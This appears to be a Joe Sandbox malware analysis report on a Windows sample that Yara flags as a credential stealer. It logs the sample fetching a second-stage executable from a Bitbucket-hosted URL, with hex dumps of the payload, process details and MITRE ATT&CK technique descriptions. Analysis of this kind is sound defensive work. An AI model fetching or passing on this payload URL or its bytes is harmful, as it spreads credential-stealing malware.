2024-12-23 16:21:20 UTC	5947	IN	HTTP/1.1 302 Found Date: Mon, 23 Dec 2024 16:21:19 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Server: AtlassianEdge Location: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNBMCGIYG4&Signature=MwdFjSVvRTtUMhrKnS0ADjCdj%2BE%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBEaCXVzLWVhc3QtMSJIMEYCIQCwJILF2PjKxyx5vAxAV73HfzgzvSyFAXVrOBvKYyt8PQIhAOdztiCBWEvV2qouvG7bsz9QPfIIuEPwLPSFr9s9WNASKrACCNn%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2IgzxrN0KOEH15yWTkuYqhALpZLUobHZAjSFUdGc6%2FstWYFcwFkCIN6wBAur9ym%2Bx27QtmKeJna5vkKnzJ9eYD78uI76p3HubjrIoVsX4TAiRhYq9JMgl0iLM6bKKE2mpndzW4WlwDvAc9cIRCYnooMCDEDk%2BWi7CIsIhzjAMjHsSNwHx2fs0f4QaWux1EuFDVbII553xmsE6nwCV04ret%2B24FulYLj8mN2oxbhTeFR0BI2MBJSWzfWLB9IdmgdizEb5d2%2Fj6HLhAGU29BdcDHvaV6F89h%2FwrVGvWIH93pBV6N1fQv5HZO6c2o0F9bD2eVJPcBBCixNQ85of04AorKC%2BjQnNGO9HTJPZxf%2F9%2BODtubfvDyzC0l6a7BjqcAQbAiUx9RQLShiyScGA1kbkexaR%2FA6TGZ%2F2aLEhmULy6VgALgWN32CiKxrc5N8c5olqLrt0DipR%2F%2F7Mms [TRUNCATED] Expires: Mon, 23 Dec 2024 16:21:19 GMT Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private X-Used-Mesh: False Vary: Accept-Language, Origin Content-Language: en X-View-Name: bitbucket.apps.downloads.views.download_file X-Dc-Location: Micros-3 X-Served-By: 4823d023cb17 X-Version: c9b3998323c0 X-Static-Version: c9b3998323c0 X-Request-Count: 1936 X-Render-Time: 0.06981706619262695 X-B3-Traceid: b020879d11c74f73b45242478fab90df X-B3-Spanid: 41c9f72dd5ea486d X-Frame-Options: SAMEORIGIN Content-Security-Policy: connect-src bitbucket.org .bitbucket.org bb-inf.net .bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.ne [TRUNCATED] X-Usage-Quota-Remaining: 998931.367 X-Usage-Request-Cost: 1088.77 X-Usage-User-Time: 0.030092 X-Usage-System-Time: 0.002571 X-Usage-Input-Ops: 0 X-Usage-Output-Ops: 0 Age: 0 X-Cache: MISS X-Content-Type-Options: nosniff X-Xss-Protection: 1; mode=block Atl-Traceid: b020879d11c74f73b45242478fab90df Atl-Request-Id: b020879d-11c7-4f73-b452-42478fab90df Strict-Transport-Security: max-age=63072000; includeSubDomains; preload Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600} Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"} Server-Timing: atl-edge;dur=180,atl-edge-internal;dur=3,atl-edge-upstream;dur=178,atl-edge-pop;desc="aws-eu-central-1" Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.9	49783	52.217.75.84	443	7832	C:\Users\user\Desktop\OtHVIQ2ge4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-23 16:21:22 UTC	1354	OUT	GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNBMCGIYG4&Signature=MwdFjSVvRTtUMhrKnS0ADjCdj%2BE%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBEaCXVzLWVhc3QtMSJIMEYCIQCwJILF2PjKxyx5vAxAV73HfzgzvSyFAXVrOBvKYyt8PQIhAOdztiCBWEvV2qouvG7bsz9QPfIIuEPwLPSFr9s9WNASKrACCNn%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2IgzxrN0KOEH15yWTkuYqhALpZLUobHZAjSFUdGc6%2FstWYFcwFkCIN6wBAur9ym%2Bx27QtmKeJna5vkKnzJ9eYD78uI76p3HubjrIoVsX4TAiRhYq9JMgl0iLM6bKKE2mpndzW4WlwDvAc9cIRCYnooMCDEDk%2BWi7CIsIhzjAMjHsSNwHx2fs0f4QaWux1EuFDVbII553xmsE6nwCV04ret%2B24FulYLj8mN2oxbhTeFR0BI2MBJSWzfWLB9IdmgdizEb5d2%2Fj6HLhAGU29BdcDHvaV6F89h%2FwrVGvWIH93pBV6N1fQv5HZO6c2o0F9bD2eVJPcBBCixNQ85of04AorKC%2BjQnNGO9HTJPZxf%2F9%2BODtubfvDyzC0l6a7BjqcAQbAiUx9RQLShiyScGA1kbkexaR%2FA6TGZ%2F2aLEhmULy6VgALgWN32CiKxrc5N8c5olqLrt0DipR%2F%2F7MmsHColzgGXJLmUHrm13atMcZf%2FuBb%2BPxmHLYKU6KY3 [TRUNCATED] Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: bbuseruploads.s3.amazonaws.com
2024-12-23 16:21:22 UTC	554	IN	HTTP/1.1 200 OK x-amz-id-2: hSQ9Tr5lVqWLUis8TXS32D6VNWBd9YPxVlUI1QbmkijFy/udvus+P2RcZ5B4uWMSNgH9uvBmeMc= x-amz-request-id: 8E1XVE8D7TJ6E3F5 Date: Mon, 23 Dec 2024 16:21:23 GMT Last-Modified: Sun, 22 Dec 2024 18:56:57 GMT ETag: "73565a0bcdcb7ff5f9ce005a2530e215" x-amz-server-side-encryption: AES256 x-amz-version-id: 7hbzHT1uhpKzZ7nBtmVCaxIrBpJnNbOS Content-Disposition: attachment; filename="FormattingCharitable.exe" Accept-Ranges: bytes Content-Type: application/x-msdownload Content-Length: 1325507 Server: AmazonS3 Connection: close
2024-12-23 16:21:22 UTC	16384	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 e4 e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 f0 0b 00 00 42 00 00 af 38 00 00 00 10 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$A{k888b<88b,888888%88"88Rich8PELGOtB8
2024-12-23 16:21:22 UTC	470	IN	Data Raw: 00 ff 75 f8 e8 bb f1 ff ff e9 7b 03 00 00 ff 75 fc e8 ae f1 ff ff 33 db 81 7d 0c 05 04 00 00 75 11 89 5d 10 c7 45 14 01 00 00 00 c7 45 0c 0f 04 00 00 83 7d 0c 4e b8 13 04 00 00 74 09 39 45 0c 0f 85 dc 00 00 00 8b 7d 14 39 45 0c 74 0d 81 7f 04 08 04 00 00 0f 85 c7 00 00 00 f7 05 08 eb 47 00 00 02 00 00 75 79 39 45 0c 74 09 8b 4d 14 83 79 08 fe 75 6b 33 c9 39 45 0c 0f 95 c1 51 ff 75 fc e8 f4 fb ff ff 3b c3 7c 56 8b 55 e8 8b c8 69 c9 20 40 00 00 8d 54 11 08 8b 0a f6 c1 10 75 40 f6 c1 40 74 14 81 f1 80 00 00 00 84 c9 79 05 83 c9 01 eb 08 83 e1 fe eb 03 83 f1 01 50 89 0a e8 c2 c4 ff ff a1 08 eb 47 00 33 c9 c1 e8 08 41 f7 d0 23 c1 89 4d 10 89 45 14 c7 45 0c 0f 04 00 00 3b fb 74 3e 81 7f 08 3d fe ff ff 75 0e ff 77 5c 53 68 19 04 00 00 ff 75 fc ff d6 81 7f 08 39 Data Ascii: u{u3}u]EE}Nt9E}9EtGuy9EtMyuk39EQu;\|VUi @Tu@@tyPG3A#MEE;t>=uw\Shu9
2024-12-23 16:21:22 UTC	16384	IN	Data Raw: 07 50 ff 15 30 91 40 00 89 1d 68 1d 44 00 89 1d 6c 1d 44 00 89 1d 10 eb 47 00 81 7d 0c 0f 04 00 00 0f 85 4b 01 00 00 53 53 e8 f4 c3 ff ff 39 5d 10 74 07 6a 08 e8 0d c6 ff ff 39 5d 14 74 3f ff 35 6c 1d 44 00 e8 d1 c4 ff ff 8b f8 57 e8 7e c4 ff ff 33 c0 33 c9 3b fb 7e 0e 8b 55 e4 39 1c 82 74 01 41 40 3b c7 7c f2 53 51 68 4e 01 00 00 ff 75 f8 ff d6 89 7d 14 c7 45 0c 20 04 00 00 53 53 e8 9d c3 ff ff a1 6c 1d 44 00 89 45 e0 a1 c8 ea 47 00 c7 45 c4 30 f0 00 00 89 5d e8 39 1d cc ea 47 00 0f 8e a1 00 00 00 8d 78 08 8b 45 e0 8b 4d e8 8b 04 88 3b c3 74 79 8b 0f 89 45 bc c7 45 b8 08 00 00 00 f7 c1 00 01 00 00 74 13 8d 47 10 c7 45 b8 09 00 00 00 89 45 c8 81 27 ff fe ff ff f6 c1 40 74 05 6a 03 58 eb 0e 8b c1 83 e0 01 40 f6 c1 10 74 03 83 c0 03 ff 75 bc 8b d1 c1 e0 0b Data Ascii: P0@hDlDG}KSS9]tj9]t?5lDW~33;~U9tA@;\|SQhNu}E SSlDEGE0]9GxEM;tyEEtGEE'@tjX@tu
2024-12-23 16:21:22 UTC	1024	IN	Data Raw: 3a 00 20 00 73 00 74 00 61 00 63 00 6b 00 20 00 65 00 6d 00 70 00 74 00 79 00 00 00 00 00 45 00 78 00 63 00 68 00 3a 00 20 00 73 00 74 00 61 00 63 00 6b 00 20 00 3c 00 20 00 25 00 64 00 20 00 65 00 6c 00 65 00 6d 00 65 00 6e 00 74 00 73 00 00 00 52 00 4d 00 44 00 69 00 72 00 3a 00 20 00 22 00 25 00 73 00 22 00 00 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 42 00 6f 00 78 00 3a 00 20 00 25 00 64 00 2c 00 22 00 25 00 73 00 22 00 00 00 44 00 65 00 6c 00 65 00 74 00 65 00 3a 00 20 00 22 00 25 00 73 00 22 00 00 00 00 00 25 00 73 00 00 00 00 00 46 00 69 00 6c 00 65 00 3a 00 20 00 77 00 72 00 6f 00 74 00 65 00 20 00 25 00 64 00 20 00 74 00 6f 00 20 00 22 00 25 00 73 00 22 00 00 00 00 00 46 00 69 00 6c 00 65 00 3a 00 20 00 65 00 72 00 72 00 6f 00 72 00 2c 00 20 Data Ascii: : stack emptyExch: stack < %d elementsRMDir: "%s"MessageBox: %d,"%s"Delete: "%s"%sFile: wrote %d to "%s"File: error,
2024-12-23 16:21:22 UTC	16384	IN	Data Raw: 3a 00 20 00 63 00 61 00 6e 00 27 00 74 00 20 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 2d 00 20 00 61 00 20 00 66 00 69 00 6c 00 65 00 20 00 61 00 6c 00 72 00 65 00 61 00 64 00 79 00 20 00 65 00 78 00 69 00 73 00 74 00 73 00 00 00 00 00 43 00 72 00 65 00 61 00 74 00 65 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 3a 00 20 00 63 00 61 00 6e 00 27 00 74 00 20 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 28 00 65 00 72 00 72 00 3d 00 25 00 64 00 29 00 00 00 43 00 72 00 65 00 61 00 74 00 65 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 3a 00 20 00 22 00 25 00 73 00 22 00 20 00 28 00 25 00 64 00 29 00 00 00 00 00 53 00 65 00 74 00 46 00 69 00 6c 00 65 00 41 00 74 00 74 00 72 Data Ascii: : can't create "%s" - a file already existsCreateDirectory: can't create "%s" (err=%d)CreateDirectory: "%s" (%d)SetFileAttr
2024-12-23 16:21:22 UTC	1024	IN	Data Raw: 08 ce 07 cd e8 df bf 7f 82 30 a8 57 9f 88 81 3d 7b 87 3d 3d 76 58 69 b7 f9 13 7f db ed 8d 09 ff d1 73 ec 8b 65 98 86 79 fa f2 e6 7a 40 df be 7d 13 00 c6 9f 7d d6 c6 c5 d3 9f bd 88 67 9e 79 a6 55 d8 60 c7 f7 ec d9 33 01 60 5c 47 a6 5b cd 7f e2 89 27 e2 d9 70 26 00 8c b7 95 47 1f 7d f4 b2 e0 c6 c1 45 74 eb f6 70 d4 93 0f 3e 19 33 fc 91 21 b5 53 9e 9a f0 a7 89 3d c7 fd f9 b9 47 fb d5 3d d8 fd c1 98 ae dd ba 46 61 19 36 81 6d 82 8d 5a 6b 24 e8 b0 e9 32 89 07 dc 28 8c e3 f9 71 fc 19 ab c3 26 31 9a 3f 0f f1 32 5e 6c 78 b6 b7 6f df 7e f9 cf 7e f6 b3 79 d0 16 d6 18 9c 2a c0 a9 01 31 01 72 f1 e5 c3 8c 98 00 68 15 34 0b da 65 75 2a 00 5a f7 c3 30 00 fd 37 1c 19 f4 dc ba 7a df 7e 6b ea f7 0d 5c 53 89 1d be 9a 03 0a 41 5a ff 28 18 ab ae 7f 5c 61 89 8b 2c 70 a5 3f ba Data Ascii: 0W={==vXiseyz@}}gyU`3`\G['p&G}Etp>3!S=G=Fa6mZk$2(q&1?2^lxo~~y1rh4euZ07z~k\SAZ(\a,p?
2024-12-23 16:21:22 UTC	1749	IN	Data Raw: db d6 0c 99 2f df b7 6f df ae d0 97 b9 12 64 7d e6 7a e5 7f e5 bf f5 ef 3a b2 dd 82 be af 40 ca 40 ca 05 65 85 f2 43 59 a2 7c d9 20 71 99 2f 27 36 0c c4 86 41 21 e3 6c b2 88 cd 83 e2 bd f7 de 53 98 df 4d d8 64 34 03 c7 d9 0a 36 21 cd 90 7a e1 08 a9 3f 26 66 3d 33 eb a3 59 6f cd 7a 2e 48 1c 98 71 62 62 c6 99 19 87 82 19 af 12 c7 12 df 8a 99 1c f3 af 4c a7 59 d3 67 d0 ac 19 b6 7c f0 ca f4 57 88 8d 0b 21 af e8 4c 9e 3c b9 19 6c 4e 2c 61 93 d2 08 1b 15 e2 1c a5 c6 f1 1b 36 40 6d 5e 9f be 1e 80 f5 58 c1 c6 a6 19 dc 08 52 b0 d9 69 06 e7 4b 4b d8 cc 28 d8 bc 34 83 cd 8b 82 4d 8b 25 6c 62 14 c3 86 0d a3 a1 c3 87 d2 d0 61 43 69 cc 8b a3 69 da f3 93 68 76 5f 2e d3 9e 36 03 30 72 c0 70 1a f2 e2 10 7a e1 c5 17 88 f3 36 b1 99 69 06 9b 17 05 9b 1a 85 7c 67 d3 a2 60 d3 Data Ascii: /od}z:@@eCY\| q/'6A!lSMd46!z?&f=3Yoz.HqbbLYg\|W!L<lN,a6@m^XRiKK(4M%lbaCiihv_.60rpz6i\|g`
2024-12-23 16:21:22 UTC	16384	IN	Data Raw: 41 04 45 04 48 10 01 14 4c 23 e0 c8 10 08 ba 19 d0 d1 c5 f9 4a b0 5a b7 15 b2 3d cd b7 db de 5d bf 89 5b fc 9b 9d 68 db 96 0d b4 67 e3 db b4 67 c3 02 da ba 7e 19 ad 5b bf 81 d6 ae 6b de 7a 17 74 31 c5 38 ca 04 42 bf 73 e7 ce 46 03 00 f0 5d 4e 49 c0 b0 60 5b d4 7f da cd 85 ac 5b d6 27 c7 c3 c4 3c 5e e6 74 a0 7a 7b 98 b5 7c bc 37 b1 b8 82 75 38 ee f6 e9 6a 19 7b 3d 50 62 6e 67 2d 0b f5 86 95 dc fa df b0 91 de 75 da a3 58 c5 fb be 01 46 80 d7 21 3d 04 8a ab 24 f0 82 59 9f 05 5d e0 ad d0 7b 0b 00 7a 01 10 37 88 65 3d 77 58 09 bb 88 bb 15 66 f7 34 7e 8b 75 8a 01 b0 12 79 9d d6 84 5e 30 85 5e 84 5b 04 be 35 a1 37 05 5e be 9b c8 f2 92 4f 80 be 1d d8 46 d9 ee c6 cf 77 f9 f3 5d db 27 10 73 23 06 48 7a 61 a4 ec e5 78 e8 c7 05 e3 38 8e 38 c6 a8 27 a8 7b 12 3b 66 6e Data Ascii: AEHL#JZ=][hgg~[kzt18BsF]NI`[['<^tz{\|7u8j{=Pbng-uXF!=$Y]{z7e=wXf4~uy^0^[57^OFw]'s#Hzax88'{;fn
2024-12-23 16:21:22 UTC	1024	IN	Data Raw: 7c 06 85 ec d9 47 19 9c dc b2 0a 72 1a 0d 00 b0 32 01 6d 31 02 97 6a 00 04 11 04 5d 2c 74 1a 05 df 84 0d 40 45 75 21 95 55 16 52 54 50 05 ad 9d de 40 d3 1e 3a 43 53 99 b5 af 34 50 64 20 8b 5e 55 11 55 d6 5e 6c 00 20 f0 e5 dc 62 ce 88 4f a1 e0 1d 9e b4 f7 8d 55 e4 f2 fa 0a 0a dc e2 aa ee 2d 2e 87 01 a8 fe ee 0d 00 c4 1f 5d fc 19 55 d5 14 7c f2 0c b7 fc 3f 51 e2 7f f0 e4 69 4a ab ac a2 52 2e 8f b2 ef 91 01 90 63 84 f5 e3 a9 67 00 e3 22 f0 fa b1 95 71 39 ee 66 bd 68 34 00 5c 77 f2 58 a0 73 73 b2 29 31 23 9f 0e 25 17 53 44 6a 31 65 e7 e4 52 79 41 16 15 e4 36 d5 41 bc 16 16 ef b1 28 28 2c a2 fc 82 42 ca e5 f5 a0 4e ca 79 7b a9 d3 40 89 b5 32 01 5c c7 f3 b8 3e e7 f2 b8 6f 08 25 4c df 44 99 5d 27 53 f5 cf fb d0 f1 3b 9e a0 da 47 87 50 21 1b 80 74 df 40 4a ce cc Data Ascii: \|Gr2m1j],t@Eu!URTP@:CS4Pd ^UU^l bOU-.]U\|?QiJR.cg"q9fh4\wXss)1#%SDj1eRyA6A((,BNy{@2\>o%LD]'S;GP!t@J
2024-12-23 16:21:22 UTC	16384	IN	Data Raw: f5 b4 fa 8d a5 b4 7a de 52 da b4 64 1d ed dc e6 44 7b 5d f7 aa 65 f0 54 59 08 3e ea 08 62 05 f5 1b 26 e2 bd f7 de a3 d1 a3 47 b7 66 00 76 b2 9a e3 41 40 78 11 d0 33 cc 93 37 74 bf fd 95 1b fb 76 0e bf 71 d0 3d 5f de fc c2 fd 74 f3 90 fb e9 c6 e7 ef fb ec 86 41 f7 06 dc 32 a8 43 7f 5e 46 06 11 ff 2b 32 00 d5 a1 83 07 d5 84 0d f6 ad 3c 3c d0 df 3e e9 bb 19 de 3a d7 d0 7e ee 67 c7 07 bd f6 eb 0f 77 be f6 cd f9 af 97 13 d1 32 66 ce 85 33 a7 66 7d 7c 0a 85 a2 0f 57 dd 00 20 51 a0 15 83 eb 00 70 ee 06 c9 03 15 01 dd 39 a0 c9 08 84 52 78 84 8d b0 f0 96 bb f3 04 d3 10 98 06 40 2a 9d 59 a1 25 58 24 a0 04 3d 78 81 24 80 46 03 c0 e0 71 99 78 2e 76 d8 be 03 e4 f6 da 2a 65 02 36 f5 9b 4e ee 3c 1e e1 13 44 69 6c 0e f0 1e 6d f3 65 43 97 63 00 ac 8c 80 95 09 d0 c5 1f 88 Data Ascii: zRdD{]eTY>b&GfvA@x37tvq=_tA2C^F+2<<>:~gw2f3f}\|W Qp9Rx@Y%X$=x$Fqx.ve6N<DilmeCc

Target ID:	0
Start time:	11:20:52
Start date:	23/12/2024
Path:	C:\Users\user\Desktop\OtHVIQ2ge4.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\OtHVIQ2ge4.exe"
Imagebase:	0x570000
File size:	2'976'256 bytes
MD5 hash:	4BA0641B1F9224605DF854C9BAAA5DCF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1490834833.000000000170A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1490653917.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1515231364.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	11:21:25
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7832 -s 1936
Imagebase:	0xa0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Function 017130AE Relevance: .4, Instructions: 378COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1490834833.000000000170A000.00000004.00000020.00020000.00000000.sdmp, Offset: 0170A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_16e9000_OtHVIQ2ge4.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9e743b0d27bd3fcd38af1bc187d7cab3c754e2763f42698345e6f93f9ea8ac8
Instruction ID: 1347c04cf68624c5b00ab342e0a09e751f8247ac6aeed671d20c06071b100c2b
Opcode Fuzzy Hash: a9e743b0d27bd3fcd38af1bc187d7cab3c754e2763f42698345e6f93f9ea8ac8
Instruction Fuzzy Hash: 9591E40649E7C15FD70387788CA8482BF76AE2752038E06DFD4D5CB9A7D3485929C3A7

Function 01713500 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1490834833.000000000170A000.00000004.00000020.00020000.00000000.sdmp, Offset: 0170A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_16e9000_OtHVIQ2ge4.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a28aa2a83c0c0127fc3bd03a67cccb9ccef255b18352e459e0806c8bcc980a3e
Instruction ID: ddb3fbe32f01ad0c7f62e20678131c868e508799433c98159a4fee238275b2ec
Opcode Fuzzy Hash: a28aa2a83c0c0127fc3bd03a67cccb9ccef255b18352e459e0806c8bcc980a3e
Instruction Fuzzy Hash: 2351D55545F3C15FD30383788CA8482BFB5AA2756039E06DFD0C4CF8A7D248591AC3AB

Function 01713701 Relevance: .2, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1490834833.000000000170A000.00000004.00000020.00020000.00000000.sdmp, Offset: 0170A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_16e9000_OtHVIQ2ge4.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d362808121ebdfc1887a7f8502ae2dcefe3e138fd36c6f3c1d516dbca921c13
Instruction ID: 8ff75516e1fa08fc21920bd47d0c72c09b9ddf0325d73e7704f59c098ed72af5
Opcode Fuzzy Hash: 9d362808121ebdfc1887a7f8502ae2dcefe3e138fd36c6f3c1d516dbca921c13
Instruction Fuzzy Hash: 2051D2564AE3C15FD70387788CA8082BF71AE2762039E06CFD4D5CF8A7D248481AC3A7

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

